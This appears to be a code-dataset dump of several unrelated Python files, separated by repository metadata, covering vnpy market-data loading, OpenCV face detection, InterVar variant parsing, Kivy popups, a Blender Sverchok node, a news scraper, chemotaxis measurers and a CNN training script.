self.to_vnpy_bar5(dbn_5min)
self.to_vnpy_bar10(dbn_10min)
def to_vnpy_bar1(self, dbn_1min):
dbn_1min = self.client[dbn_1min]
db_bar1 = dbn_1min[self.symbol]
data = self.data
print(u"清空数据库%s" % db_bar1)
db_bar1.drop()
db_bar1.insert_many(data.to_dict('record'))
def to_vnpy_bar5(self, dbn_5min):
db_bar5 = self.client[dbn_5min][self.symbol]
data = self.data
        # resample to 5-minute bars
bar5 = NewMinuteBar(data, 5).new()
print(u"清空数据库%s" % db_bar5)
db_bar5.drop()
db_bar5.insert_many(bar5.to_dict('record'))
def to_vnpy_bar10(self, dbn_10min):
db_bar10 = self.client[dbn_10min][self.symbol]
data = self.data
        # resample to 10-minute bars
bar10 = NewMinuteBar(data, 10).new()
print(u"清空数据库%s" % db_bar10)
db_bar10.drop()
db_bar10.insert_many(bar10.to_dict('record'))
class LoadTdxDailyHis(LoadBase):
"""
从通达信的历史数据导入, 日线数据
"""
def load(self, path):
return pd.read_csv(
path,
# index_col='datetime',
names=['date', 'open', 'high', 'low', 'close', 'volume', 'position', 'settlement'],
parse_dates={'datetime': ["date"]},
keep_date_col=True,
engine="python",
skip_footer=1,
encoding='gbk',
)
def to_vnpy(self, dbn_1day):
"""
:return:
"""
self.to_vnpy_day_bar1(dbn_1day)
def to_vnpy_day_bar1(self, dbn_1day):
"""
分钟线计算收盘价是不准确的,因为有收盘价和结算价,有些结算价是收盘最后3分钟的平均价格
:return:
"""
self.db_day_bar1 = self.client["VnTrader_Daily_Db"][symbol]
db_day_bar1 = self.db_day_bar1
data = self.data
db_day_bar1.drop()
db_day_bar1.insert(data.to_dict('record'))
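# Usage sketch (illustrative; the file paths, symbol and database names below
# are assumptions, not taken from this module):
#
#   minute_loader = LoadTdxMinHis("data/rb888_1min.csv", "rb888")
#   minute_loader.to_vnpy("VnTrader_1Min_Db", "VnTrader_5Min_Db", "VnTrader_10Min_Db")
#   daily_loader = LoadTdxDailyHis("data/rb888_day.csv", "rb888")
#   daily_loader.to_vnpy("VnTrader_Daily_Db")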
|
gpl-3.0
| -6,288,002,198,736,356,000
| 23.324841
| 103
| 0.515318
| false
| 2.820532
| false
| false
| false
|
PuercoPop/FaceRec
|
apps/WebUi/testhaar.py
|
1
|
1298
|
import cv
import os
from os.path import join
from django.conf import settings
def find_faces( img_url ):
cascade = cv.Load( join(settings.ROOT_DIR,'apps/WebUi/haarcascade_frontalface_alt.xml') )
directory= join(settings.MEDIA_ROOT , 'Uploads/')
target_directory = join( directory, 'Portraits/')
portrait_list = []
img = cv.LoadImage( directory + img_url)
imgGray = cv.CreateImage( cv.GetSize(img), img.depth , 1)
cv.CvtColor(img, imgGray, cv.CV_BGR2GRAY)
faces = cv.HaarDetectObjects( imgGray, cascade , cv.CreateMemStorage(),)
if len(faces)>0:
print "Detecto Algo"
else:
print "Miss"
for counter , ((x, y, w, h), n) in enumerate(faces):
        cv.SetImageROI(img, (x,y,w,h))  # set the region of interest
imgface = cv.CreateImage( cv.GetSize(img),img.depth,img.nChannels)
imgface_rsz = cv.CreateImage( (128,128) ,img.depth,img.nChannels)
cv.Copy(img,imgface)
cv.Resize(imgface, imgface_rsz, cv.CV_INTER_AREA)
cv.SaveImage( target_directory + str(img_url[:-4]) + "_" + str(counter ) +".png",imgface_rsz)
portrait_list.append( 'Uploads/Portraits/' + str(img_url[:-4]) + "_" + str(counter ) +".png")
cv.ResetImageROI(img)
return portrait_list
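# Usage sketch (illustrative; the file name is an assumption): for an image
# previously saved under MEDIA_ROOT/Uploads/,
#
#   portraits = find_faces('group_photo.jpg')
#
# returns the media-relative paths of the 128x128 face crops written to
# Uploads/Portraits/.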
if __name__ == "__main__":
find_faces_dir( '../MockUpCode/Images/')
|
bsd-2-clause
| 2,583,801,675,626,725,000
| 30.658537
| 97
| 0.656394
| false
| 2.852747
| false
| false
| false
|
jessada/pyCMM
|
pycmm/cmmlib/intervarlib.py
|
1
|
2195
|
import re
RAW_INTERVAR_CLASS_BENIGN = "Benign"
RAW_INTERVAR_CLASS_LIKELY_BENIGN = "Likelybenign"
RAW_INTERVAR_CLASS_UNCERTAIN_SIGNIFICANCE = "UncertainSignificance"
RAW_INTERVAR_CLASS_LIKELY_PATHOGENIC = "Likelypathogenic"
RAW_INTERVAR_CLASS_PATHOGENIC = "Pathogenic"
INTERVAR_CLASS_BENIGN = "Benign"
INTERVAR_CLASS_LIKELY_BENIGN = "Likely Benign"
INTERVAR_CLASS_UNCERTAIN_SIGNIFICANCE = "Uncertain Significance"
INTERVAR_CLASS_LIKELY_PATHOGENIC = "Likely Pathogenic"
INTERVAR_CLASS_PATHOGENIC = "Pathogenic"
CLASSIFICATION_PATTERN = re.compile(r'''InterVar:(?P<acmg_class>.+?);''')
EVIDENCE_PATTERN = re.compile(r'''(?P<var_name>[a-zA-Z0-9]*?)=(?P<value>(?:[0-9]+?|\[[0-9;]*?\]))''')
def parse_intervar_class(raw_intervar):
class_match = CLASSIFICATION_PATTERN.match(raw_intervar)
if class_match is not None:
intervar_class = class_match.group('acmg_class')
if intervar_class == RAW_INTERVAR_CLASS_BENIGN:
return INTERVAR_CLASS_BENIGN
if intervar_class == RAW_INTERVAR_CLASS_LIKELY_BENIGN:
return INTERVAR_CLASS_LIKELY_BENIGN
if intervar_class == RAW_INTERVAR_CLASS_UNCERTAIN_SIGNIFICANCE:
return INTERVAR_CLASS_UNCERTAIN_SIGNIFICANCE
if intervar_class == RAW_INTERVAR_CLASS_LIKELY_PATHOGENIC:
return INTERVAR_CLASS_LIKELY_PATHOGENIC
if intervar_class == RAW_INTERVAR_CLASS_PATHOGENIC:
return INTERVAR_CLASS_PATHOGENIC
return ""
def evidence2str(raw_evidence):
evidence_list = []
for item in raw_evidence:
var_name = item[0]
value = eval(item[1].replace(';',','))
if type(value) is int and value == 1:
evidence_list.append(var_name)
elif type(value) is list:
for value_idx in xrange(len(value)):
var_name_val = value[value_idx]
if var_name_val == 1:
evidence_list.append(var_name+str(value_idx+1))
return ", ".join(evidence_list)
def parse_intervar_evidence(raw_intervar):
class_match = CLASSIFICATION_PATTERN.match(raw_intervar)
evidence_matchs = EVIDENCE_PATTERN.findall(raw_intervar, re.DOTALL)
return evidence2str(evidence_matchs)
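# Worked example (the input string below is hypothetical, but follows the
# "InterVar:<class>;" plus "name=value" layout the regexes above expect):
#
#   raw = "InterVar:Likelypathogenic; PVS1=1 PS=[0;0;1;0] PM=[1;0;0;0;0;0]"
#   parse_intervar_class(raw)     # -> "Likely Pathogenic"
#   parse_intervar_evidence(raw)  # -> "PVS1, PS3, PM1"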
|
gpl-2.0
| 5,027,679,920,982,609,000
| 41.211538
| 101
| 0.676538
| false
| 2.962213
| false
| false
| false
|
jamalmoir/ml_demo
|
libs/garden/xpopup/xbase.py
|
1
|
4736
|
"""
XBase class
============
Subclass of :class:`xpopup.XPopup`.
Base class for all popup extensions. Don't use this class directly.
Examples
--------
How to create your own class based on :class:`XBase`? It's easy!
The content of the popup should be implemented in the :meth:`XBase._get_body`::
class MyPopup(XBase):
def _get_body(self):
return Label(text='Hello World!')
popup = MyPopup()
By default, popup will automatically opened when the instance was created.
If you don't want that, you can set :attr:`auto_open` to False::
popup = MyPopup(auto_open=False)
If you want to add buttons to the popup, just use :attr:`buttons`::
popup = MyPopup(buttons=[MyPopup.BUTTON_OK, MyPopup.BUTTON_CANCEL])
Pressing the button will trigger the 'dismiss' event. The button that was
pressed, can be obtained from the :attr:`button_pressed`. You can use it
in your callback::
def my_callback(instance):
print('Button "', instance.button_pressed, '" was pressed.')
popup = MyPopup(auto_open=False, buttons=['Ok', 'Cancel'])
popup.bind(on_dismiss=my_callback)
popup.open()
If you include a XBase.BUTTON_CANCEL in your set of buttons, then you can
use :meth:`XBase.is_canceled` to check if it was pressed::
def my_callback(instance):
if instance.is_canceled():
print('Popup was canceled.')
else:
print('Button "', instance.button_pressed, '" was pressed.')
"""
from kivy import metrics
from kivy.factory import Factory
from kivy.properties import BooleanProperty, ListProperty, StringProperty,\
NumericProperty
from kivy.uix.boxlayout import BoxLayout
try:
from .tools import gettext_ as _
from .xpopup import XPopup
except:
from tools import gettext_ as _
from xpopup import XPopup
__author__ = 'ophermit'
class XBase(XPopup):
"""XBase class. See module documentation for more information.
"""
auto_open = BooleanProperty(True)
'''This property determines if the pop-up is automatically
opened when the instance was created. Otherwise use :meth:`XBase.open`
:attr:`auto_open` is a :class:`~kivy.properties.BooleanProperty` and
defaults to True.
'''
buttons = ListProperty()
'''List of button names. Can be used when using custom button sets.
:attr:`buttons` is a :class:`~kivy.properties.ListProperty` and defaults to
[].
'''
button_pressed = StringProperty('')
'''Name of button which has been pressed.
:attr:`button_pressed` is a :class:`~kivy.properties.StringProperty` and
defaults to '', read-only.
'''
size_hint_x = NumericProperty(.6, allownone=True)
size_hint_y = NumericProperty(.3, allownone=True)
auto_dismiss = BooleanProperty(False)
'''Overrides properties from :class:`~kivy.uix.popup.Popup`
'''
min_width = NumericProperty(metrics.dp(300), allownone=True)
min_height = NumericProperty(metrics.dp(150), allownone=True)
fit_to_window = BooleanProperty(True)
'''Overrides properties from :class:`XPopup`
'''
BUTTON_OK = _('Ok')
BUTTON_CANCEL = _('Cancel')
BUTTON_YES = _('Yes')
BUTTON_NO = _('No')
BUTTON_CLOSE = _('Close')
'''Basic button names
'''
def __init__(self, **kwargs):
# preventing change content of the popup
kwargs.pop('content', None)
self._pnl_buttons = None
super(XBase, self).__init__(**kwargs)
layout = BoxLayout(orientation="vertical")
layout.add_widget(self._get_body())
self._pnl_buttons = BoxLayout(size_hint_y=None)
layout.add_widget(self._pnl_buttons)
self.add_widget(layout)
# creating buttons panel
self.property('buttons').dispatch(self)
if self.auto_open:
self.open()
def _on_click(self, instance):
self.button_pressed = instance.id
self.dismiss()
def _get_body(self):
"""Returns the content of the popup. You need to implement
this in your subclass.
"""
raise NotImplementedError
def on_buttons(self, instance, buttons):
if self._pnl_buttons is None:
return
self._pnl_buttons.clear_widgets()
if len(buttons) == 0:
self._pnl_buttons.height = 0
return
self._pnl_buttons.height = metrics.dp(30)
for button in buttons:
self._pnl_buttons.add_widget(
Factory.XButton(
text=button, id=button, on_release=self._on_click))
def is_canceled(self):
"""Check the `cancel` event
:return: True, if the button 'Cancel' has been pressed
"""
return self.button_pressed == self.BUTTON_CANCEL
|
gpl-3.0
| 3,830,199,417,355,320,300
| 28.786164
| 79
| 0.641047
| false
| 3.878788
| false
| false
| false
|
DolphinDream/sverchok
|
nodes/scene/objects_mk3.py
|
1
|
12461
|
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
import bpy
from bpy.props import BoolProperty, StringProperty
import bmesh
import sverchok
from sverchok.node_tree import SverchCustomTreeNode
from sverchok.utils.nodes_mixins.sv_animatable_nodes import SvAnimatableNode
from sverchok.data_structure import updateNode
from sverchok.utils.sv_bmesh_utils import pydata_from_bmesh
from sverchok.core.handlers import get_sv_depsgraph, set_sv_depsgraph_need
from sverchok.utils.nodes_mixins.show_3d_properties import Show3DProperties
class SvOB3BDataCollection(bpy.types.PropertyGroup):
name: bpy.props.StringProperty()
icon: bpy.props.StringProperty(default="BLANK1")
class SVOB3B_UL_NamesList(bpy.types.UIList):
def draw_item(self, context, layout, data, item, icon, active_data, active_propname, index):
item_icon = item.icon
if not item.icon or item.icon == "BLANK1":
try:
item_icon = 'OUTLINER_OB_' + bpy.data.objects[item.name].type
except:
item_icon = ""
layout.label(text=item.name, icon=item_icon)
action = data.wrapper_tracked_ui_draw_op(layout, "node.sv_ob3b_collection_operator", icon='X', text='')
action.fn_name = 'REMOVE'
action.idx = index
class SvOB3BItemOperator(bpy.types.Operator):
bl_idname = "node.sv_ob3b_collection_operator"
bl_label = "bladibla"
idname: bpy.props.StringProperty(name="node name", default='')
idtree: bpy.props.StringProperty(name="tree name", default='')
fn_name: bpy.props.StringProperty(default='')
idx: bpy.props.IntProperty()
def execute(self, context):
node = bpy.data.node_groups[self.idtree].nodes[self.idname]
if self.fn_name == 'REMOVE':
node.object_names.remove(self.idx)
node.process_node(None)
return {'FINISHED'}
class SvOB3Callback(bpy.types.Operator):
bl_idname = "node.ob3_callback"
bl_label = "Object In mk3 callback"
bl_options = {'INTERNAL'}
fn_name: StringProperty(default='')
idname: StringProperty(name="node name", default='')
idtree: StringProperty(name="tree name", default='')
def execute(self, context):
"""
returns the operator's 'self' too to allow the code being called to
print from self.report.
"""
if self.idtree and self.idname:
ng = bpy.data.node_groups[self.idtree]
node = ng.nodes[self.idname]
else:
node = context.node
getattr(node, self.fn_name)(self)
return {'FINISHED'}
class SvObjectsNodeMK3(Show3DProperties, bpy.types.Node, SverchCustomTreeNode, SvAnimatableNode):
"""
Triggers: obj Input Scene Objects pydata
Tooltip: Get Scene Objects into Sverchok Tree
"""
bl_idname = 'SvObjectsNodeMK3'
bl_label = 'Objects in'
bl_icon = 'OUTLINER_OB_EMPTY'
sv_icon = 'SV_OBJECTS_IN'
def hide_show_versgroups(self, context):
outs = self.outputs
showing_vg = 'Vers_grouped' in outs
if self.vergroups and not showing_vg:
outs.new('SvStringsSocket', 'Vers_grouped')
elif not self.vergroups and showing_vg:
outs.remove(outs['Vers_grouped'])
def modifiers_handle(self, context):
set_sv_depsgraph_need(self.modifiers)
updateNode(self, context)
groupname: StringProperty(
name='groupname', description='group of objects (green outline CTRL+G)',
default='', update=updateNode)
modifiers: BoolProperty(
name='Modifiers',
description='Apply modifier geometry to import (original untouched)',
default=False, update=modifiers_handle)
vergroups: BoolProperty(
name='Vergroups',
        description='Use vertex groups for nested insertion',
default=False, update=hide_show_versgroups)
sort: BoolProperty(
name='sort by name',
description='sorting inserted objects by names',
default=True, update=updateNode)
object_names: bpy.props.CollectionProperty(type=SvOB3BDataCollection, options={'SKIP_SAVE'})
active_obj_index: bpy.props.IntProperty()
def sv_init(self, context):
new = self.outputs.new
new('SvVerticesSocket', "Vertices")
new('SvStringsSocket', "Edges")
new('SvStringsSocket', "Polygons")
new('SvStringsSocket', "MaterialIdx")
new('SvMatrixSocket', "Matrixes")
new('SvObjectSocket', "Object")
def get_objects_from_scene(self, ops):
"""
Collect selected objects
"""
self.object_names.clear()
        groups = bpy.data.groups
        if self.groupname and groups[self.groupname].objects:
            names = [obj.name for obj in groups[self.groupname].objects]
else:
names = [obj.name for obj in bpy.data.objects if (obj.select_get() and len(obj.users_scene) > 0 and len(obj.users_collection) > 0)]
if self.sort:
names.sort()
for name in names:
item = self.object_names.add()
item.name = name
item.icon = 'OUTLINER_OB_' + bpy.data.objects[name].type
if not self.object_names:
ops.report({'WARNING'}, "Warning, no selected objects in the scene")
return
self.process_node(None)
def select_objs(self, ops):
"""select all objects referenced by node"""
for item in self.object_names:
bpy.data.objects[item.name].select = True
if not self.object_names:
ops.report({'WARNING'}, "Warning, no object associated with the obj in Node")
def draw_obj_names(self, layout):
if self.object_names:
layout.template_list("SVOB3B_UL_NamesList", "", self, "object_names", self, "active_obj_index")
else:
layout.label(text='--None--')
def draw_buttons(self, context, layout):
self.draw_animatable_buttons(layout, icon_only=True)
col = layout.column(align=True)
row = col.row()
op_text = "Get selection" # fallback
callback = 'node.ob3_callback'
try:
addon = context.preferences.addons.get(sverchok.__name__)
if addon.preferences.over_sized_buttons:
row.scale_y = 4.0
op_text = "G E T"
except:
pass
self.wrapper_tracked_ui_draw_op(row, callback, text=op_text).fn_name = 'get_objects_from_scene'
col = layout.column(align=True)
row = col.row(align=True)
row.prop(self, 'sort', text='Sort', toggle=True)
row.prop(self, "modifiers", text="Post", toggle=True)
row.prop(self, "vergroups", text="VeGr", toggle=True)
self.draw_obj_names(layout)
def draw_buttons_ext(self, context, layout):
layout.prop(self, 'draw_3dpanel', text="To Control panel")
self.draw_animatable_buttons(layout)
def draw_buttons_3dpanel(self, layout):
callback = 'node.ob3_callback'
row = layout.row(align=True)
row.label(text=self.label if self.label else self.name)
colo = row.row(align=True)
colo.scale_x = 1.6
self.wrapper_tracked_ui_draw_op(colo, callback, text='Get').fn_name = 'get_objects_from_scene'
def get_verts_and_vertgroups(self, obj_data):
vers = []
vers_grouped = []
for k, v in enumerate(obj_data.vertices):
if self.vergroups and v.groups.values():
vers_grouped.append(k)
vers.append(list(v.co))
return vers, vers_grouped
def get_materials_from_bmesh(self, bm):
return [face.material_index for face in bm.faces[:]]
def get_materials_from_mesh(self, mesh):
return [face.material_index for face in mesh.polygons[:]]
def sv_free(self):
set_sv_depsgraph_need(False)
def process(self):
if not self.object_names:
return
scene = bpy.context.scene
data_objects = bpy.data.objects
outputs = self.outputs
edgs_out = []
vers_out = []
vers_out_grouped = []
pols_out = []
mtrx_out = []
materials_out = []
if self.modifiers:
sv_depsgraph = get_sv_depsgraph()
# iterate through references
for obj in (data_objects.get(o.name) for o in self.object_names):
if not obj:
continue
edgs = []
vers = []
vers_grouped = []
pols = []
mtrx = []
materials = []
with self.sv_throttle_tree_update():
mtrx = obj.matrix_world
                if obj.type in {'EMPTY', 'CAMERA', 'LAMP'}:
mtrx_out.append(mtrx)
continue
try:
if obj.mode == 'EDIT' and obj.type == 'MESH':
# Mesh objects do not currently return what you see
# from 3dview while in edit mode when using obj.to_mesh.
me = obj.data
bm = bmesh.from_edit_mesh(me)
vers, edgs, pols = pydata_from_bmesh(bm)
materials = self.get_materials_from_bmesh(bm)
del bm
else:
"""
this is where the magic happens.
                        because we are in throttled tree update state at this point, we can acquire a depsgraph if
- modifiers
- or vertex groups are desired
"""
if self.modifiers:
obj = sv_depsgraph.objects[obj.name]
obj_data = obj.to_mesh(preserve_all_data_layers=True, depsgraph=sv_depsgraph)
else:
obj_data = obj.to_mesh()
if obj_data.polygons:
pols = [list(p.vertices) for p in obj_data.polygons]
vers, vers_grouped = self.get_verts_and_vertgroups(obj_data)
materials = self.get_materials_from_mesh(obj_data)
edgs = obj_data.edge_keys
obj.to_mesh_clear()
except Exception as err:
print('failure in process between frozen area', self.name, err)
vers_out.append(vers)
edgs_out.append(edgs)
pols_out.append(pols)
mtrx_out.append(mtrx)
materials_out.append(materials)
vers_out_grouped.append(vers_grouped)
if vers_out and vers_out[0]:
outputs['Vertices'].sv_set(vers_out)
outputs['Edges'].sv_set(edgs_out)
outputs['Polygons'].sv_set(pols_out)
if 'MaterialIdx' in outputs:
outputs['MaterialIdx'].sv_set(materials_out)
if 'Vers_grouped' in outputs and self.vergroups:
outputs['Vers_grouped'].sv_set(vers_out_grouped)
outputs['Matrixes'].sv_set(mtrx_out)
outputs['Object'].sv_set([data_objects.get(o.name) for o in self.object_names])
def save_to_json(self, node_data: dict):
node_data['object_names'] = [o.name for o in self.object_names]
def load_from_json(self, node_data: dict, import_version: float):
for named_object in node_data.get('object_names', []):
self.object_names.add().name = named_object
classes = [SvOB3BItemOperator, SvOB3BDataCollection, SVOB3B_UL_NamesList, SvOB3Callback, SvObjectsNodeMK3]
register, unregister = bpy.utils.register_classes_factory(classes)
|
gpl-3.0
| -1,058,146,421,217,799,300
| 33.233516
| 143
| 0.595137
| false
| 3.761244
| false
| false
| false
|
mwweinberg/china-daily-email
|
combine_rfa_qz.py
|
1
|
4422
|
from bs4 import BeautifulSoup
import urllib
#csv is for the csv writer
import csv
#this will hold the output
holder = {}
#opens the input doc
txt = open("qz-rfa.csv")
#is the contents of the doc
#inputs = txt.read()
#opens the output doc
output_txt = open("output.txt", "w")
print txt
def headliner(url):
#iterate through the urls
parsed_urls = csv.reader(url)
for row in parsed_urls:
number = 0
row_contents = row[number]
print row_contents
number += 1
if "rfa" in row_contents:
#opens the url for read access
this_url = urllib.urlopen(row_contents).read()
#creates a new BS holder based on the URL
soup = BeautifulSoup(this_url, 'lxml')
#creates the headline section
headline_text = 'Radio Free Asia: '
headline = soup.find_all('title')
for element in headline:
headline_text += ''.join(element.findAll(text = True)).encode('utf-8').strip()
            #creates the body text
#This turns the html text into regular text
article_text = row_contents + "\n" + "\r"
#This finds each paragraph
article = soup.find("div", {"id" : "storytext"}).findAll('p')
#for each paragraph
for element in article:
#add a line break and then the text part of the paragraph
#the .encode part fixes unicode bullshit
article_text += '\n' + ''.join(element.findAll(text = True)).encode('utf-8').strip()
holder[headline_text] = article_text
"""
output_txt.write(str(headline_text))
output_txt.write("\n")
output_txt.write("\r")
output_txt.write("\r")
output_txt.write(str(headline_text))
output_txt.write("\n")
output_txt.write(str(article_text))
output_txt.write("\n")
output_txt.write("\r")
output_txt.write("\r")
output_txt.write("\r")
output_txt.write("\r")
"""
if "qz" in row_contents:
#opens the url for read access
this_url = urllib.urlopen(row_contents).read()
#creates a new BS holder based on the URL
soup = BeautifulSoup(this_url, 'lxml')
#creates the headline section
headline_text = 'Quartz: '
headline = soup.find_all('h1')
for element in headline:
headline_text += ''.join(element.findAll(text = True)).encode('utf-8').strip()
            #creates the body text
            #This turns the html text into regular text
article_text = row_contents + "\n" + "\r"
#This finds each paragraph
article = soup.find("div", {"class" : "item-body"}).findAll('p')
#for each paragraph
for element in article:
#add a line break and then the text part of the paragraph
#the .encode part fixes unicode bullshit
article_text += '\n' + ''.join(element.findAll(text = True)).encode('utf-8').strip()
holder[headline_text] = article_text
"""
output_txt.write(str(headline_text))
output_txt.write("\n")
output_txt.write("\r")
output_txt.write("\r")
output_txt.write(str(headline_text))
output_txt.write("\n")
output_txt.write(str(article_text))
output_txt.write("\n")
output_txt.write("\r")
output_txt.write("\r")
output_txt.write("\r")
output_txt.write("\r")
"""
else:
print "not a story from a known source"
headliner(txt)
#this is just for debugging
print holder
#iterates through the headlines in holder and writes them to the doc
#this is the TOC
for head, body in holder.items():
output_txt.write(str(head))
output_txt.write("\r")
output_txt.write("\r")
#iterates through the headlines and body in holder and writes them to doc
#this is the body of the email
for head, body in holder.items():
output_txt.write("\r")
output_txt.write(str(head))
output_txt.write("\r")
output_txt.write("\r")
output_txt.write(str(body))
output_txt.write("\r")
txt.close()
output_txt.close()
|
mit
| 8,655,176,811,197,885,000
| 27.901961
| 100
| 0.55337
| false
| 3.976619
| false
| false
| false
|
eddiejessup/ahoy
|
ahoy/dc_dx_measurers.py
|
1
|
3735
|
from __future__ import print_function, division
from abc import ABCMeta, abstractmethod
import numpy as np
from ciabatta.meta import make_repr_str
from ahoy.ring_buffer import CylinderBuffer
from ahoy import measurers, c_measurers
def get_K(t, dt, t_rot_0):
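    """Discretised response kernel used by TemporalDcDxMeasurer, sampled every
    dt up to time t: K(s) ~ exp(-s / t_rot_0) * (1 - A * (s / t_rot_0 + (s / t_rot_0) ** 2 / 2))
    with A = 0.5. The negative lobe is rescaled so the positive and negative
    parts cancel, and the kernel is normalised so that sum(K * -ts * dt) == 1.
    """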
A = 0.5
ts = np.arange(0.0, t, dt)
gs = ts / t_rot_0
K = np.exp(-gs) * (1.0 - A * (gs + (gs ** 2) / 2.0))
trunc_scale = np.abs(K[K >= 0.0].sum() / K[K < 0.0].sum())
K[K < 0.0] *= trunc_scale
norm_const = np.sum(K * -ts * dt)
K /= norm_const
return K
class DcDxMeasurer(measurers.Measurer):
__metaclass__ = ABCMeta
@abstractmethod
def get_dc_dxs(self):
return
class SpatialDcDxMeasurer(DcDxMeasurer):
def __init__(self, directions, grad_c_measurer):
self.directions = directions
self.grad_c_measurer = grad_c_measurer
def get_dc_dxs(self):
grad_c = self.grad_c_measurer.get_grad_cs()
return np.sum(self.directions.u * grad_c, axis=-1)
def __repr__(self):
fs = [('grad_c_measurer', self.grad_c_measurer)]
return make_repr_str(self, fs)
class TemporalDcDxMeasurer(DcDxMeasurer):
def __init__(self, c_measurer, v_0, dt_mem, t_mem, t_rot_0,
time):
self.c_measurer = c_measurer
self.v_0 = v_0
self.dt_mem = dt_mem
self.t_mem = t_mem
cs = self.c_measurer.get_cs()
n = cs.shape[0]
self.K_dt = get_K(self.t_mem, self.dt_mem, t_rot_0) * self.dt_mem
self.c_mem = CylinderBuffer(n, self.K_dt.shape[0])
self.time = time
# Optimisation, only calculate dc_dx when c memory is updated.
self.dc_dx_cache = np.zeros([n])
self.t_last_update = 0.0
def _iterate(self):
cs = self.c_measurer.get_cs()
self.c_mem.update(cs)
def _get_dc_dxs(self):
return self.c_mem.integral_transform(self.K_dt) / self.v_0
def iterate(self):
t_now = self.time.t
if t_now - self.t_last_update > 0.99 * self.dt_mem:
self._iterate()
self.dc_dx_cache = self._get_dc_dxs()
self.t_last_update = t_now
# TODO: This is bad, it both returns a value *and* has side-effects.
# Iterating the measurer and getting the value should be distinct.
def get_dc_dxs(self):
self.iterate()
return self.dc_dx_cache
def __repr__(self):
fs = [('c_measurer', self.c_measurer), ('v_0', self.v_0),
('dt_mem', self.dt_mem), ('t_mem', self.t_mem),
('t_last_update', self.t_last_update)]
return make_repr_str(self, fs)
def dc_dx_factory(temporal_chemo_flag,
ds=None,
ps=None, v_0=None, dt_mem=None, t_mem=None, t_rot_0=None, time=None,
c_field_flag=None, c_field=None):
if temporal_chemo_flag:
return temporal_dc_dx_factory(ps, v_0, dt_mem, t_mem, t_rot_0, time,
c_field_flag, c_field)
else:
return spatial_dc_dx_factory(ds, c_field_flag, c_field, ps)
def spatial_dc_dx_factory(ds, c_field_flag=None, c_field=None, ps=None):
if not c_field_flag:
grad_c_measurer = c_measurers.ConstantGradCMeasurer(ds.n, ds.dim)
else:
grad_c_measurer = c_measurers.FieldGradCMeasurer(c_field, ps)
return SpatialDcDxMeasurer(ds, grad_c_measurer)
def temporal_dc_dx_factory(ps, v_0, dt_mem, t_mem, t_rot_0, time,
c_field_flag=None, c_field=None):
if not c_field_flag:
c_measurer = c_measurers.LinearCMeasurer(ps)
else:
c_measurer = c_measurers.FieldCMeasurer(c_field, ps)
return TemporalDcDxMeasurer(c_measurer, v_0, dt_mem, t_mem, t_rot_0, time)
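# Usage sketch (illustrative; `directions` and `positions` stand in for the
# ahoy objects this factory expects, constructed elsewhere):
#
#   measurer = dc_dx_factory(temporal_chemo_flag=False, ds=directions,
#                            ps=positions, c_field_flag=False)
#   dc_dxs = measurer.get_dc_dxs()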
|
bsd-3-clause
| 5,803,516,902,066,002,000
| 31.763158
| 86
| 0.584739
| false
| 2.842466
| false
| false
| false
|
Bleyddyn/malpi
|
exp/test.py
|
1
|
5744
|
from time import time
import datetime
import numpy as np
import matplotlib.pyplot as plt
from malpi.cnn import *
from malpi.data_utils import get_CIFAR10_data
from malpi.solver import Solver
from optparse import OptionParser
from malpi.fast_layers import *
def plot_solver(solver):
plt.subplot(2, 1, 1)
plt.plot(solver.loss_history, 'o')
plt.xlabel('iteration')
plt.ylabel('loss')
plt.subplot(2, 1, 2)
plt.plot(solver.train_acc_history, '-o')
plt.plot(solver.val_acc_history, '-o')
plt.legend(['train', 'val'], loc='upper left')
plt.xlabel('epoch')
plt.ylabel('accuracy')
plt.show()
def getCIFAR10(verbose=True):
data = get_CIFAR10_data(num_training=49000)
if verbose:
for k, v in data.iteritems():
print '%s: ' % k, v.shape
return data
def log( message, name='test' ):
logFileName = name + ".log"
fmt = '%Y-%m-%d-%H-%M-%S'
datestr = datetime.datetime.now().strftime(fmt)
with open(logFileName,'a') as outf:
outf.write(datestr + ": " + message + "\n")
def hyperparameterGenerator( oneRun = False ):
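    """Yield hyper-parameter dicts for a small grid search; with oneRun=False
    this is 3 regularisation values x 3 learning rates x 1 decay = 9 settings,
    each carrying reg, lr, lr_decay, epochs, batch_size and update keys.
    """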
variations = np.array([0.9,1.0,1.1])
if oneRun:
reguls = [3.37091767808e-05]
lrs = [0.0002006801544726]
else:
reguls = np.array([3.37091767808e-05]) * variations
lrs = np.array([0.0002006801544726]) * variations
#reguls = 10 ** np.random.uniform(-5, -4, 2) #[0.0001, 0.001, 0.01]
#lrs = 10 ** np.random.uniform(-6, -3, 5) #[1e-4, 1e-3, 1e-2]
#reguls = np.append([3.37091767808e-05],reguls)
#lrs = np.append([0.000182436504066],lrs)
decays = [1.0]
for reg in reguls:
for lr in lrs:
for decay in decays:
hparams = { "reg": reg, "lr": lr, "lr_decay":decay, "epochs":6, "batch_size":50, "update":"adam" }
yield hparams
def train():
name = "ThreeLayerTest2"
# layers = ["conv-8", "maxpool", "conv-16", "maxpool", "conv-32", "fc-10"]
# layer_params = [{'filter_size':3}, {'pool_stride':2, 'pool_width':2, 'pool_height':2},
# {'filter_size':3}, {'pool_stride':2, 'pool_width':2, 'pool_height':2},
# {'filter_size':3},
# {'relu':False}]
layers = ["conv-8", "maxpool", "conv-16", "maxpool", "conv-32", "fc-10"]
layer_params = [{'filter_size':3, 'stride':1, 'pad':1 }, {'pool_stride':2, 'pool_width':2, 'pool_height':2},
{'filter_size':3}, {'pool_stride':2, 'pool_width':2, 'pool_height':2},
{'filter_size':3},
{'relu':False}]
log( "%s = %s" % (name, str(layers)), name )
log( " %s" % (str(layer_params,)), name )
data = getCIFAR10(verbose=False)
model_name = name + ".pickle"
val_accs = []
best_solver = None
best_val_acc = 0.0
best_model = load_malpi( model_name, verbose=False)
if best_model:
best_val_acc = best_model.validation_accuracy
for hparams in hyperparameterGenerator(oneRun=False):
model = MalpiConvNet(layers, layer_params, reg=hparams['reg'], dtype=np.float16, verbose=False)
model.hyper_parameters = hparams
solver = Solver(model, data,
num_epochs=hparams['epochs'], batch_size=hparams['batch_size'],
